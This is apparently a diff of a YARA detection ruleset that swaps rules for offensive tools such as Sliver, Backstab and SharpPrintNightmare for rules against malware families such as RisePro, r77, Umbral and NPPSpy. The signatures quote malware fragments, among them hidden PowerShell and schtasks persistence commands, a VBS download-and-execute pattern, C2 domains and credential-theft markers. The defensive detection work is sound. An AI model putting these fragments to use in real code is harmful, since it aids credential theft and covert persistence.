-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L785-L798"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11172-L11190"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b0d22a296cab6591d63568aa44845ef7fcc413d45c368a712928411d11a8177"
+		logic_hash = "97088c0decf158d45a02571bd50b5f370c139339c19b8071f38c0f9816232d1f"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "ecp/default.flt?" ascii wide nocase
-		$s2 = "owa/auth/logon.aspx?" ascii wide nocase
-		$s3 = "X-AnonResource-Backend" ascii wide
-		$s4 = "EWS/Exchange.asmx?" ascii wide nocase
-		$s5 = "X-BEResource" ascii wide
-		$s6 = "https://%s/owa/auth/" ascii wide
+		$s1 = "Sapphire.Modules." ascii
+		$s2 = "sapphire\\" wide
+		$s3 = "by r3vengerx0" wide
+		$s4 = "Sapphire\\obj\\" ascii
+		$s5 = "[ERROR_GETSECRETKEY_METHOD]" fullword wide
+		$s6 = "[ERROR_CANT_GET_PASSWORD]" fullword wide
+		$s7 = "<h2>------NEW LOGS------</h2>" wide
+		$s8 = "[ERROR] can't create grab directory" wide
+		$s9 = "<UploadToTelegram>d__" ascii
+		$s10 = "UploadToTelegram" ascii
+		$s11 = ".SendLog+<UploadToTelegram>d__" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 5 of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Goclr : FILE
+
+rule DITEKSHEN_MALWARE_Win_R77 : FILE
 {
 	meta:
-		description = "Detects binaries utilizing Go-CLR for hosting the CLR in a Go process and using it to execute a DLL from disk or an assembly from memory"
+		description = "Detects r77 rootkit"
 		author = "ditekSHen"
-		id = "21766cad-17dd-525a-9ebe-cd90e892cff1"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "813d207e-c6d9-5fea-8387-19da33bc3317"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L800-L814"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11192-L11217"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2a79793b1f530bcf9f79983f29a655f270cf0147606690b19eaeb82d4bd1f0d"
+		logic_hash = "e3ec6e88a3a77b7dc69eb51a528e6417f6b8695c7cb01d699cf248cebd9b84e2"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "github.com/ropnop/go-clr.(*IC" ascii
-		$s2 = "EnumKeyExWRegEnumValueWRegOpenKeyExWRtlCopyMemoryRtlGetVersionShellExecuteWStartServiceW" ascii
-		$c1 = "ICorRuntimeHost" ascii wide
-		$c2 = "CLRCreateInstance" ascii wide
-		$c3 = "ICLRRuntimeInfo" ascii wide
-		$c4 = "ICLRMetaHost" ascii wide
-		$go = "Go build ID:" ascii wide
+		$s1 = "startup" fullword wide
+		$s2 = "process_names" fullword wide
+		$s3 = "paths" fullword wide
+		$s4 = "service_names" fullword wide
+		$s5 = "tcp_local" fullword wide
+		$s6 = "tcp_remote" fullword wide
+		$s7 = "\\\\.\\pipe\\" wide
+		$s8 = "SOFTWARE\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 2 of ( $c* ) and $go )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 5 of them and pe.exports ( "ReflectiveDllMain" ) ) or ( 5 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".detourd" ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Edgecookiesview : FILE
+rule DITEKSHEN_MALWARE_Win_Disco_Nightclub : FILE
 {
 	meta:
-		description = "Detects EdgeCookiesView"
+		description = "Hunts for Disco NightClub"
 		author = "ditekSHen"
-		id = "42c6eb2e-bf5c-5956-9009-c29551ce715d"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "79cbd351-e5d9-5f1f-8e73-71e0acca2707"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L833-L847"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11219-L11237"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ba6d416e02c1958806356c67636609dcca758da9f7e3d1fc15244cc5ff038fc"
+		logic_hash = "ee0bd110ea1a3182284c4b3d6dd7eff48ca809a35a925147c716b18a88c0a233"
 		score = 75
-		quality = 75
+		quality = 51
 		tags = "FILE"
 
 	strings:
-		$s1 = "AddRemarkCookiesTXT" fullword wide
-		$s2 = "# Netscape HTTP Cookie File" fullword wide
-		$s3 = "/scookiestxt" fullword wide
-		$s4 = "/deleteregkey" fullword wide
-		$s5 = "Load cookies from:" wide
-		$s6 = "Old cookies folder of Edge/IE" wide
-		$pdb = "\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" ascii
+		$s1 = "\\OfficeBroker\\OfficeBroker.exe" ascii wide nocase
+		$s2 = "\\EDGEUPDATE\\EDGEAOUT" ascii wide nocase
+		$s3 = "\\EDGEUPDATE\\update" ascii wide nocase
+		$s4 = "windows.system.update.com" ascii wide nocase
+		$s5 = "edgeupdate-security-windows.com" ascii wide nocase
+		$s6 = "nightclub::" ascii wide nocase
+		$s7 = "EncryptedPasswordFlt" ascii wide nocase
+		$s8 = "Microsoft\\def\\Gfr45.cfg" ascii wide nocase
+		$s9 = "::keylog::" ascii wide nocase
+		$pdb1 = "\\AbcdMainProject\\Rootsrc\\Projects\\MainS\\Ink\\" ascii wide nocase
+		$pdb2 = "\\Autogen\\Kh\\AutogenAlg\\" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpnopsexec : FILE
+rule DITEKSHEN_MALWARE_Win_Risepro : FILE
 {
 	meta:
-		description = "Detects SharpNoPSExec"
-		author = "ditekSHen"
-		id = "10898364-6d77-5127-a16b-5fd3b1c652d5"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects RisePro infostealer"
+		author = "ditekShen"
+		id = "77bc8791-cbe8-53b5-86f4-bc918454a6a6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L849-L864"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11239-L11269"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c1d76639e7b6464d302729b48bbcd810216132868035904bb9866e7b31ccfac2"
+		logic_hash = "f6f1832f316df51ca108a3c75034bd53c3823cd3d9b16da120e12e252dbf90ff"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "|-> Service" wide
-		$s2 = "authenticated as" wide
-		$s3 = "ImpersonateLoggedOnUser failed. Error:{0}" wide
-		$s4 = "uPayload" fullword ascii
-		$s5 = "pcbBytesNeeded" fullword ascii
-		$s6 = "SharpNoPSExec" ascii wide
-		$pdb1 = "SharpNoPSExec\\obj\\Debug\\SharpNoPSExec.pdb" ascii
-		$pdb2 = "SharpNoPSExec\\obj\\Release\\SharpNoPSExec.pdb" ascii
+		$x1 = "t.me/riseprosupport" ascii wide nocase
+		$s1 = "failed readpacket" fullword wide
+		$s2 = "faield sendpacket" fullword wide
+		$s3 = "PersistWal" fullword wide
+		$s4 = /CRED_ENUMERATE_(ALL|SESSION)_CREDENTIALS/ fullword ascii
+		$s5 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" fullword wide
+		$s6 = { 4c 00 6f 00 67 00 69 00 6e 00 20 00 44 00 61 00
+                74 00 61 [10] 57 00 65 00 62 00 20 00 44 00 61 00
+                74 00 61 [2] 48 00 69 00 73 00 74 00 6f 00 72 00
+                79 [21] 43 00 6f 00 6f 00 6b 00 69 00 65 00 73 }
+		$s7 = { 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00
+                69 00 6f 00 6e 00 2f 00 78 00 2d 00 77 00 77 00
+                77 00 2d 00 66 00 6f 00 72 00 6d 00 2d 00 75 00
+                72 00 6c 00 65 00 6e 00 63 00 6f 00 64 00 65 00
+                64 00 3b 00 20 00 63 00 68 00 61 00 72 00 73 00
+                65 00 74 00 3d 00 75 00 74 00 66 00 2d 00 38 00
+                42 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74
+                00 69 00 6f 00 6e 00 2f 00 6a 00 73 00 6f 00 6e
+                00 2c 00 20 00 74 00 65 00 78 00 74 00 2f 00 70
+                00 6c 00 61 00 69 00 6e 00 2c 00 20 00 2a 00 2f
+                00 2a }
+		$s8 = /_(SET|GET)_(GRABBER|LOADER)/ wide
+		$s9 = /catch (save )?(windows cred|screen|pluginscrypto|historyCC|autofill|cookies|passwords|passwords sql|autofills sql|dwnlhistory sql|discordToken|quantum|isDropped)/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Chromecookiesview : FILE
+rule DITEKSHEN_MALWARE_Win_Graphicalproton_Rsockstun : FILE
 {
 	meta:
-		description = "Detects ChromeCookiesView"
-		author = "ditekSHen"
-		id = "c1b89468-edf2-59d1-89b3-5822fa19d6ab"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects GraphicalProton custom rsockstun"
+		author = "ditekShen"
+		id = "5efa85f6-7e73-53a1-92df-4cb975e62345"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L866-L880"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11271-L11286"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "81acd0978fc03525e7092ab51c681b61f9de0252066ce871298e2cd96b1d3024"
+		logic_hash = "ca4d18160b89d82106310237cf81bba57a7f51be77a31d2f18ca8c2987972c2c"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "AddRemarkCookiesTXT" fullword wide
-		$s2 = "Decrypt cookies" wide
-		$s3 = "/scookiestxt" fullword wide
-		$s4 = "/deleteregkey" fullword wide
-		$s5 = "Cookies.txt Format" wide
-		$s6 = "# Netscape HTTP Cookie File" wide
-		$pdb = "\\ChromeCookiesView\\Release\\ChromeCookiesView.pdb" ascii
+		$m1 = "main.connectviaproxy" ascii
+		$m2 = "main.connectForSocks" ascii
+		$m3 = "main.listenForClients" ascii
+		$m4 = "main.listenForSocks" ascii
+		$s1 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
+		$s2 = "Server: nginx/1.14.1" ascii
+		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" ascii
+		$s4 = "wine_get" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $m* ) and 2 of ( $s* ) ) or ( all of ( $s* ) and 1 of ( $m* ) ) or 7 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sliver : FILE
+
+rule DITEKSHEN_MALWARE_Win_PWSHDLLDL : FILE
 {
 	meta:
-		description = "Detects Sliver implant cross-platform adversary emulation/red team"
-		author = "ditekSHen"
-		id = "e0c5404b-8e6b-5c3a-9e37-56012c3802dd"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects downloader"
+		author = "ditekShen"
+		id = "553ed216-c8c2-504f-b689-0e8d21a00eaa"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L882-L900"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11288-L11303"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f9442b74c84c7b4a8fcf93de2919d12efe2f41d0b4e8514b43822fba0962af2"
+		logic_hash = "7acef81f0e6e282650c161963599dcbe2b3975d482eb7c330581901b0fe85655"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "github.com/bishopfox/sliver/protobuf/sliverpbb." ascii
-		$s1 = ".commonpb.ResponseR" ascii
-		$s2 = ".PortfwdProtocol" ascii
-		$s3 = ".WGTCPForwarder" ascii
-		$s4 = ".WGSocksServerR" ascii
-		$s5 = ".PivotEntryR" ascii
-		$s6 = ".BackdoorReq" ascii
-		$s7 = ".ProcessDumpReq" ascii
-		$s8 = ".InvokeSpawnDllReq" ascii
-		$s9 = ".SpawnDll" ascii
-		$s10 = ".TCPPivotReq" ascii
+		$s1 = "powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file " fullword wide nocase
+		$s2 = "objShell.run \"powershell -WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
+		$s3 = "cmd.exe /c schtasks.exe /create /tn \"" fullword wide nocase
+		$s4 = "-WindowStyle hidden -command wscript.exe //b //nologo '" fullword wide nocase
+		$s6 = "\" /tr \"wscript.exe //b //nologo '" fullword wide nocase
+		$s7 = "\" -Value \"Powershell.exe -WindowStyle hidden \"\"& '" fullword wide nocase
+		$op0 = { 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 }
+		$op1 = { 4b 04 00 00 34 01 00 00 7f 05 00 00 1a }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 1 of ( $x* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Owlproxy : FILE
+
+rule DITEKSHEN_MALWARE_Win_Nppspy : FILE
 {
 	meta:
-		description = "Hunt for OwlProxy"
-		author = "ditekSHen"
-		id = "86e2144e-c5d3-5bd6-b287-1157066126a3"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects NPPSpy / Ntospy"
+		author = "ditekShen"
+		id = "3867ba96-1162-5693-b58e-fc6fa04d880a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L902-L921"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11305-L11325"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fa7dd5eeb9799fd651317ceecbed6c960f16c387dc18723409053e44cd281582"
+		logic_hash = "53e929b52dddd5e3d060d2dd9937411f1ff215be4d3c67f5935c2a3fbab006d6"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$is1 = "call_new command: " wide
-		$is2 = "call_proxy cmd: " wide
-		$is3 = "download_file: " wide
-		$is4 = "cmdhttp_run" wide
-		$is5 = "sub_proxyhttp_run" wide
-		$is6 = "proxyhttp_run" wide
-		$is7 = "webshell_run" wide
-		$is8 = "/exchangetopicservices/" fullword wide
-		$is9 = "c:\\windows\\system32\\wmipd.dll" fullword wide
-		$iu1 = "%s://+:%d%s" wide
-		$iu2 = "%s://+:%d%spp/" wide
-		$iu3 = "%s://+:%d%spx/" wide
+		$s1 = "ntskrnl.dll" fullword ascii
+		$s2 = "PasswordStealing.dll" fullword ascii
+		$s3 = "ntoskrnl.dll" fullword ascii
+		$s4 = "\\programdata\\packag~" ascii
+		$s5 = "NPPSPY.dll" fullword ascii
+		$s6 = "MSControll.dll" fullword ascii
+		$s7 = "\\Windows\\Temp\\" ascii
+		$s8 = "\\NPPSpy\\" ascii
+		$s9 = "NPGetCaps" fullword ascii
+		$s10 = "NPLogonNotify" fullword ascii
+		$path = "\\GrzegorzTworek\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of ( $is* ) or ( all of ( $iu* ) and 2 of ( $is* ) )
+		uint16( 0 ) == 0x5a4d and ( ( pe.is_dll ( ) and filesize < 110KB and pe.number_of_exports == 2 and ( ( pe.exports ( "NPGetCaps" ) and pe.exports ( "NPLogonNotify" ) ) or ( 1 of ( $s* ) and ( pe.exports ( "NPGetCaps" ) or pe.exports ( "NPLogonNotify" ) ) ) ) ) or ( ( $path ) and any of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Backstab : FILE
+rule DITEKSHEN_MALWARE_Win_Agentracoon : FILE
 {
 	meta:
-		description = "Detect Backstab tool capable of killing antimalware protected processes by leveraging sysinternals Process Explorer (ProcExp) driver"
-		author = "ditekSHen"
-		id = "1e514d03-9b78-5e75-9a31-02c0413e23a7"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects AgentRacoon. Not Raccoon"
+		author = "ditekShen"
+		id = "cc31bd71-da96-5a3d-b2f1-40f9745d8d46"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L923-L939"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11327-L11343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d25c3ff4d7c120fdf7c275d11da7a321bcbdb275dcfaa699b5bb4bd66167ec92"
+		logic_hash = "7ed17a1bc161855f2bdc432952086f3b86b58ae9ea6c0d541544f4b63a8e08e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "NtLoadDriver: %x" fullword ascii
-		$s2 = "POSIXLY_CORRECT" fullword ascii
-		$s3 = "\\\\.\\PROCEXP" ascii
-		$s4 = "ProcExpOpenProtectedProcess.DeviceIoControl: %" ascii
-		$s5 = "ProcExpKillHandle.DeviceIoControl" ascii
-		$s6 = "[%#llu] [%ws]: %ws" fullword ascii
-		$s7 = "D:P(A;;GA;;;SY)(A;;GRGWGX;;;BA)(A;;GR" wide
-		$s8 = "-k -d c:\\\\driver.sys" ascii
-		$s9 = "backstab.exe -" ascii
+		$s1 = "UdpClient" fullword ascii
+		$s2 = "IPEndPoint" fullword ascii
+		$s3 = "get_Client" fullword ascii
+		$s4 = "set_ReceiveTimeout" fullword ascii
+		$s5 = "Command failed:" wide
+		$s6 = "uploaded" wide
+		$s7 = "downloaded" wide
+		$s8 = ".telemetry." wide
+		$s9 = "xn--" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Sharpprintnightmare : FILE
+rule DITEKSHEN_MALWARE_Win_Simda : FILE
 {
 	meta:
-		description = "Detect SharpPrintNightmare"
-		author = "ditekSHen"
-		id = "15f52fce-27cc-52e7-91d5-7e2f6db5b596"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Simda / Shifu infostealer"
+		author = "ditekShen"
+		id = "892a5ffe-ea1a-5df3-9c36-0198fa61b8b6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L941-L961"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11345-L11361"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "22c890a22ce6b7c1a06068018364f7c5a2afe1bee5b5bc6a8bae3703a11fac26"
+		logic_hash = "3f06e86033e8f9534f9904a2a63c4717a9532eb235f6f4405ef1db7d9b93f036"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "RevertToSelf() Error:" wide
-		$s2 = "NeverGonnaGiveYou" wide
-		$s3 = "\\Amd64\\UNIDRV.DLL" wide
-		$s4 = ":\\Windows\\System32\\DriverStore\\FileRepository\\" wide
-		$s5 = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}" wide
-		$s6 = "\\SharpPrintNightmare\\" ascii
-		$s7 = { 4e 61 6d 65 09 46 75 6c 6c 54 72 75 73 74 01 }
-		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\PackageInstallation\\Windows x64\\DriverPackages" wide
-		$s9 = "ntprint.inf_amd64" wide
-		$s10 = "AddPrinterDriverEx" wide
-		$s11 = "addPrinter" ascii
-		$s12 = "DRIVER_INFO_2" ascii
-		$s13 = "APD_COPY_" ascii
+		$s1 = "command=auth_loginByPassword&back_command=&back_custom1=&" fullword ascii
+		$s2 = "iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clma" ascii
+		$s3 = "debug_%s_%s.log" fullword ascii
+		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"report\"" ascii
+		$s5 = "name=%s&port=%u" ascii
+		$s6 = "id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d" ascii
+		$s7 = "{BotVer:" fullword ascii
+		$s8 = "software\\microsoft\\windows nt\\currentversion\\winlogon" ascii
+		$s9 = /(!|&|data_)inject(=ok)?/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_REC_Adfind : FILE
+rule DITEKSHEN_MALWARE_Win_Vbsdownloader : FILE
 {
 	meta:
-		description = "Detect ADFind"
-		author = "ditekSHen"
-		id = "2f0d02a1-7488-5645-aa08-1eadee2862e8"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects second stage VBS downloader of third stage VBS"
+		author = "ditekShen"
+		id = "480e6872-3a8c-58c5-a455-02342ec7918c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L963-L974"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11363-L11375"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41fb9f72032f76adc6f1fccd25a1364f153eb2430063e9d582f3dcd9fc9ac84a"
+		logic_hash = "fee9a78e60d02ff2f03035812af2bf36fe350c70d3e4e094713791833f8ba4d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\AdFind\\AdFind\\AdFind.h" ascii
-		$s2 = "\\AdFind\\AdFind\\AdFind.cpp" ascii
-		$s3 = "\\AdFind\\Release\\AdFind.pdb" ascii
-		$s4 = "joeware_default_adfind.cf" ascii
+		$s1 = "CreateObject(\"MSXML2.ServerXMLHTTP\")" wide
+		$s2 = ".Open \"GET\"," wide
+		$s3 = ".Send" wide
+		$s4 = ".responseText" wide
+		$s5 = "ExecuteGlobal" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		filesize < 50KB and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_CNC_Chisel : FILE
+rule DITEKSHEN_MALWARE_Win_Umbralstealer : FILE
 {
 	meta:
-		description = "Detect binaries using Chisel"
-		author = "ditekSHen"
-		id = "d126f2c8-655f-564f-ae46-f6bd6385dcac"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Umbral infostealer"
+		author = "ditekShen"
+		id = "695a350b-3d8e-5244-a275-a60202a8e956"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L976-L990"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11377-L11398"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "08c7b2c4725431c1bf85ae8068f4250c98e58890e3b4c97aa9e419e4f487cada"
+		logic_hash = "1686e4626e4d6335f028d6cb6471c32dac747a77fc95d97b4c9dfd043ba975e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "chisel-v" ascii
-		$s2 = "sendchisel-v" ascii
-		$s3 = "<-chiselclosedcookiedomainefenceempty" ascii
-		$ws1 = "Sec-WebSocket-Key" ascii
-		$ws2 = "Sec-WebSocket-Protocol" ascii
-		$ws3 = "Sec-Websocket-Version" ascii
-		$ws4 = "Sec-Websocket-Extensions" ascii
+		$x1 = "Umbral Stealer" wide
+		$x2 = "Umbral.payload." ascii
+		$s1 = "U2V0LU1wUHJlZmVyZW5jZ" wide
+		$s2 = "{{ Key = {0}, Value = {1} }}" wide
+		$s3 = "csproduct get uuid" wide
+		$s4 = "0.0.0.0 www."
+		$s5 = /(set|get)_Take(Screen|WebcamSnap)shot/ fullword ascii
+		$s6 = "still_pin" fullword ascii
+		$c1 = "kaspersky.com" wide
+		$c2 = "bitdefender.com" wide
+		$c3 = "virustotal.com" wide
+		$c4 = "malwarebytes.com" wide
+		$c5 = "clamav.net" wide
+		$c6 = "trendmicro.com" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) and 3 of ( $ws* ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 4 of ( $c* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ANT_Sharpedrchecker : FILE
+rule DITEKSHEN_MALWARE_Win_Metastealer : FILE
 {
 	meta:
-		description = "Detect SharpEDRChecke, C# Implementation of Invoke-EDRChecker"
+		description = "Detects MetaStealer infostealer"
 		author = "ditekSHen"
-		id = "c0b41787-b8b4-5aa7-b1f0-0a89dbebe45e"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "46aa30c1-12c2-56df-8c65-0b96147f9051"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L992-L1023"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11400-L11423"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77a26ff5298dddebc669d9b6c39905a48a86884cf98adebdf935b94c62d36ddc"
+		logic_hash = "260c6d90a89ddb6219a5cbad18058e41611ae2dc68a8d4e589fa6ca81853752f"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$pdb1 = "\\SharpEDRChecker.pdb" fullword ascii
-		$x1 = "EDRData" fullword ascii
-		$x2 = "bytesNeeded" fullword ascii
-		$x3 = /\] Checking (Directories|drivers|processes|modules|Registry|Services) \[/ wide
-		$s1 = "CheckService" fullword ascii
-		$s2 = "CheckModule" fullword ascii
-		$s3 = "PrivCheck" fullword ascii
-		$s4 = "ServiceChecker" fullword ascii
